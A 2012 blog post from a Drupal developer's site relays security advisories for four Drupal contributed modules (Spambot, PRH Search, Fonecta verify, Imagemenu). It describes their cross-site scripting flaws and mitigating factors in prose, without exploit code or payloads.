Parasolx

Professional in Drupal web development, theme designing, consultation and training

Security Update: Contrib 2012 142-145

21 Sep 2012 - 09:05 am

Spambot - Cross Site Scripting (XSS)

The Spambot module enables you to protect new user registrations from spammers using the database at stopforumspam.com.

Spambot doesn't sufficiently sanitize API responses from stopforumspam.com when they are logged to the watchdog, allowing a potential XSS attack.

This vulnerability is mitigated by the fact that only stopforumspam.com (or someone pretending to be stopforumspam.com) can exploit it.

PRH Search - Cross Site Scripting (XSS)

PRH Search provides an interface to search for association information for Finnish association using the PRH (Patentti- ja Rekisterihallitus) database. The module fails to sanitize data retrieved from an untrusted third party source, thereby exposing an arbitrary script injection vulnerability (XSS).

This vulnerability is mitigated by the fact that an attacker must have either gained access to that third party source or use techniques such as DNS spoofing in order to inject malicious data.

Fonecta verify - Cross Site Scripting (XSS)

Fonecta verify provides an interface to retrieve information from the Finnish Fonecta company information database. The module contains an arbitrary script injection vulnerability (XSS) due to the fact that it fails to sanitize data retrieved from an untrusted third party source.

This vulnerability is mitigated by the fact that an attacker must have either gained access to that third party source or use techniques such as DNS spoofing in order to inject malicious data.

Imagemenu - Cross Site Scripting (XSS)

Imagemenu module allows you to create Drupal menus from images files.

The module doesn't sufficiently escape image file names when rendering menus, allowing a potential XSS attack.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer imagemenu".

Kategori: 
Tags: 
security fix